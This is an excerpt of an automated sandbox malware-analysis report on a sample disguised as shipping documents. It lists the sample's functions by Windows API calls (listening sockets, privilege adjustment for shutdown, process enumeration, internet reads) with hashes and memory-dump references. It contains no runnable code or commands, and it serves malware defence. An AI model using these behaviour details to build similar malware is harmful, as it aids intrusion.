                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZ
                    • API String ID: 1300846289-3798167742
                    • Opcode ID: 053961aba1bd31846d2f4247c50a9e4686a5ce9c174867d06dbd8733d74e4b6e
                    • Instruction ID: ad159bcfae678620ba5abe75abbb3a5f3b1a9def55674b8fc0f5bab4b7466168
                    • Opcode Fuzzy Hash: 053961aba1bd31846d2f4247c50a9e4686a5ce9c174867d06dbd8733d74e4b6e
                    • Instruction Fuzzy Hash: 8202CD71A00209DFDF14DF64D982AAEBBF5EF84300F149469F846EB295EB30DA55CB90
                    Function 00E65264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E58AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                      • Part of subcall function 00E58AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                      • Part of subcall function 00E58AA3: GetLastError.KERNEL32 ref: 00E58B27
                    • ExitWindowsEx.USER32(?,00000000), ref: 00E652A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    • Opcode ID: 46b435936589ad6015999f426ca500f3a4710d94f9ab314cfdb7aa01ca6e7664
                    • Instruction ID: 35ae1f778a9acc910ee5d025bb51b27ecb3a082bc35ab8f1c0cd60145474c52b
                    • Opcode Fuzzy Hash: 46b435936589ad6015999f426ca500f3a4710d94f9ab314cfdb7aa01ca6e7664
                    • Instruction Fuzzy Hash: 1D01FC327D06125FE7281678BC6BBF672B8DB057C5F242525FD07F24F2D9505C048590
                    Function 00E13190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    • API String ID: 674341424-3945284152
                    • Opcode ID: 0fbe020c7014010ccd6f175c7602246f62a1e624f4740f440c610ea3a7d6eb88
                    • Instruction ID: dc96e60dec548a07c07d459621bff20f47d990aba4973d79421726045a762e7f
                    • Opcode Fuzzy Hash: 0fbe020c7014010ccd6f175c7602246f62a1e624f4740f440c610ea3a7d6eb88
                    • Instruction Fuzzy Hash: A2229F716083019FD724DF24D881BAFB7E5BF84714F10691DF49AA7292DB70EA84CB92
                    Function 00E76399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E763F2
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76401
                    • bind.WSOCK32(00000000,?,00000010), ref: 00E7641D
                    • listen.WSOCK32(00000000,00000005), ref: 00E7642C
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76446
                    • closesocket.WSOCK32(00000000,00000000), ref: 00E7645A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    • Opcode ID: df41ea42c80cd0d52c5d2f3ddb3886cae39315c561284ae10f4ab1e054631c76
                    • Instruction ID: 61a85f56d8fec9a79c7a1c07119d8f64d6d3b55e2bed6f10f884647e2ec5671e
                    • Opcode Fuzzy Hash: df41ea42c80cd0d52c5d2f3ddb3886cae39315c561284ae10f4ab1e054631c76
                    • Instruction Fuzzy Hash: 4E21D031600600AFDB04EF64C889A6EB7F9EF44728F109569F86AB72D2DB30AC45CB51
                    Function 00E01287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E019FA
                    • GetSysColor.USER32(0000000F), ref: 00E01A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E01A61
                      • Part of subcall function 00E01290: DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    • Opcode ID: 9c17122695840a141f734fcea79d7fd54f609fe3c74ddd7b69c3f6adb169b822
                    • Instruction ID: 767d10f1f2a090babf34a94da836b818f765ff0c94b322c5844cdaf288466a14
                    • Opcode Fuzzy Hash: 9c17122695840a141f734fcea79d7fd54f609fe3c74ddd7b69c3f6adb169b822
                    • Instruction Fuzzy Hash: 57A13871205944BED629ABA98C48EBB39ACDB82349F24319EF507FD1D1CA219DC1D271
                    Function 00E7685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E77EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77ECB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E768B4
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E768DD
                    • bind.WSOCK32(00000000,?,00000010), ref: 00E76916
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76923
                    • closesocket.WSOCK32(00000000,00000000), ref: 00E76937
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    • Opcode ID: 89f48fd1ef96fb11544423a8945ad3e4b807df5e2c105e77c70606939ee9f90e
                    • Instruction ID: 0a6f43317996203b5deab866aec31f70fea6db6a38a566e7122a6d29c712a0f9
                    • Opcode Fuzzy Hash: 89f48fd1ef96fb11544423a8945ad3e4b807df5e2c105e77c70606939ee9f90e
                    • Instruction Fuzzy Hash: 4A41D431B00610AFEB14AF68DC86F6E77E8DB48714F449058F95ABB2C3DA705D418791
                    Function 00E853DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    • Opcode ID: 8563f59290a0113514c1685cacd169eaf483f66809d5852d904bb37579e911aa
                    • Instruction ID: eaca590fe4252453b9c211a246e40c2fa9acc91f6f43ed74a3972c9c4e3e1c13
                    • Opcode Fuzzy Hash: 8563f59290a0113514c1685cacd169eaf483f66809d5852d904bb37579e911aa
                    • Instruction Fuzzy Hash: D511E232700A106FE7216F26CC44B6A7799FF84722B405428F85FF7251CF309C828794
                    Function 00E7C104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E41CB7,?), ref: 00E7C112
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C124
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: a66ca1898bc6de930b2947b0358c33a5ae6ab1597a99995409740be759cff354
                    • Instruction ID: f83735d0cd340d6735f847f00b154bf90a0da458d8bd32926cef8786ae2d07af
                    • Opcode Fuzzy Hash: a66ca1898bc6de930b2947b0358c33a5ae6ab1597a99995409740be759cff354
                    • Instruction Fuzzy Hash: 58E0EC79602723CFD7205B26D819A4276E8EF08759B90E43DE88EF2252E774D885C750
                    Function 00E7EF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EF51
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00E7EF5F
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00E7F01F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7F02E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    • Opcode ID: f641f4362c72823071a450a3bdb27d126ef602fe3237d4d1abd4bc9682c6b27c
                    • Instruction ID: 6b70e7983396c584ce6fd1ee0be3f2bcb8259a6c7d703e6a67f699810360913a
                    • Opcode Fuzzy Hash: f641f4362c72823071a450a3bdb27d126ef602fe3237d4d1abd4bc9682c6b27c
                    • Instruction Fuzzy Hash: ED5180715083019FD310EF24DC86E6BB7E8FF98710F14582DF599A7292EB70A948CB92
                    Function 00E5E928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E5E93A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    • Opcode ID: 8b7656ac57cae9692a591702eab4223cbc46dd28d486b333efff7a556c4ce010
                    • Instruction ID: e34d5a2076b824abfba678c10592fe758b2d91704c0e28b08766e5fd26bc9b53
                    • Opcode Fuzzy Hash: 8b7656ac57cae9692a591702eab4223cbc46dd28d486b333efff7a556c4ce010
                    • Instruction Fuzzy Hash: 37322775A007059FD728CF29C48196AB7F1FF48310B15D96EE99AEB3A2E770E941CB40
                    Function 00E72404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E71920,00000000), ref: 00E724F7
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E7252E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    • Opcode ID: 71723fc9041d58430f776861f1fb3225037b769ae8ec815757953eb05970ce17
                    • Instruction ID: eb8b41fad4738dbdcf45a3ff4de125a99eb4a09c693de510337500c25d91c476
                    • Opcode Fuzzy Hash: 71723fc9041d58430f776861f1fb3225037b769ae8ec815757953eb05970ce17
                    • Instruction Fuzzy Hash: 1041F471A00209BFEB20DE95DC85EBBB7FCEB40728F10D06EF709B6141EA719E419661
                    Function 00E6B3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6B3CF
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E6B429
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E6B476
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    • Opcode ID: 3046a829effb41d4f6a74ecb8c799f70c8f85083aa32a29d58b3a01c9c7ad9ae
                    • Instruction ID: 932147b585a24dd95b00d9e63453a3ed8d127cf0e6ca4cb45c721fd300d16f82
                    • Opcode Fuzzy Hash: 3046a829effb41d4f6a74ecb8c799f70c8f85083aa32a29d58b3a01c9c7ad9ae
                    • Instruction Fuzzy Hash: 87213035A10518EFCB00EFA5D884AEEBBF8FF49314F1480A9E905EB362DB319955CB51
                    Function 00E58AA3 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                    • GetLastError.KERNEL32 ref: 00E58B27
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    • Opcode ID: 9e1bd9ade7230c5cb59d2dbb9c0ab6711abd0daa0bea27f40341d772cdf16a7f
                    • Instruction ID: 26278b139f573c1c628ceaf3dda1b3b01c10a991689eebbc7e16832cb779e7d8
                    • Opcode Fuzzy Hash: 9e1bd9ade7230c5cb59d2dbb9c0ab6711abd0daa0bea27f40341d772cdf16a7f
                    • Instruction Fuzzy Hash: 1311C1B1514204AFE728DF54ED85D2BB7FCFB44311B20856EF445A3251EB30AC04CB60
                    Function 00E64A08 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                    Download Yara Rule
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E64A31
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E64A48
                    • FreeSid.ADVAPI32(?), ref: 00E64A58
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    • Opcode ID: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                    • Instruction ID: 7a4485854020c54c3e8a78874fe256594faf5298d333a4bb180348506ae074d0
                    • Opcode Fuzzy Hash: ac0923996efa3c2838f2130a1b9ce1812a1902477a405bd3ea93fa9c21ae77a1
                    • Instruction Fuzzy Hash: C1F03775A51308BFDB00DFE09C89AAEBBB8EB08201F1044A9E905E2181E6746A089B50
                    Function 00E68932 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 00E68944
                      • Part of subcall function 00E2537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E69017,00000000,?,?,?,?,00E691C8,00000000,?), ref: 00E25383
                      • Part of subcall function 00E2537A: __aulldiv.LIBCMT ref: 00E253A3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0e
                    • API String ID: 2893107130-533242481
                    • Opcode ID: 56d844452656f8f84109a193092650709827e9bfd8e2d2a2799b32f59488b368
                    • Instruction ID: 8fc43fe269583a1ce3581e723c88551d42e2dac1f9660a8ff9aeb26a9192f362
                    • Opcode Fuzzy Hash: 56d844452656f8f84109a193092650709827e9bfd8e2d2a2799b32f59488b368
                    • Instruction Fuzzy Hash: AA21B432635610CFC729CF25D841A52B3E1EBA5310B289F6CE1E9DB2D0CA75B905CB54
                    Function 00E0E060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f96811b315d9bb0b292e7a9b8b0d2348890fcbc6f9e98ead362de6ac2880ee54
                    • Instruction ID: 543f35cec9f0ae562b7e8200ee92c847248ca6488e86283b1a5581fa924558c9
                    • Opcode Fuzzy Hash: f96811b315d9bb0b292e7a9b8b0d2348890fcbc6f9e98ead362de6ac2880ee54
                    • Instruction Fuzzy Hash: D6228C70A00216DFDB24DF64D480AAABBF0FF08314F149979E856BB391E374A985CB91
                    Function 00E6C75D Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E6C787
                    • FindClose.KERNEL32(00000000), ref: 00E6C7B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: f394df5441fa23a8e549fc7e243bfd6310717b264c9496a919f4a67f00498868
                    • Instruction ID: a8d3033a9e683061dcc1d0b46b2ad39751bd61ef7fa83b180f136a4b85cf97ed
                    • Opcode Fuzzy Hash: f394df5441fa23a8e549fc7e243bfd6310717b264c9496a919f4a67f00498868
                    • Instruction Fuzzy Hash: CA11A1326106009FD710DF29D845A2AF7E8FF94324F00891EF9A9E72A1DB30AC04CF81
                    Function 00E6A0F4 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E7957D,?,00E8FB84,?), ref: 00E6A121
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E7957D,?,00E8FB84,?), ref: 00E6A133
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
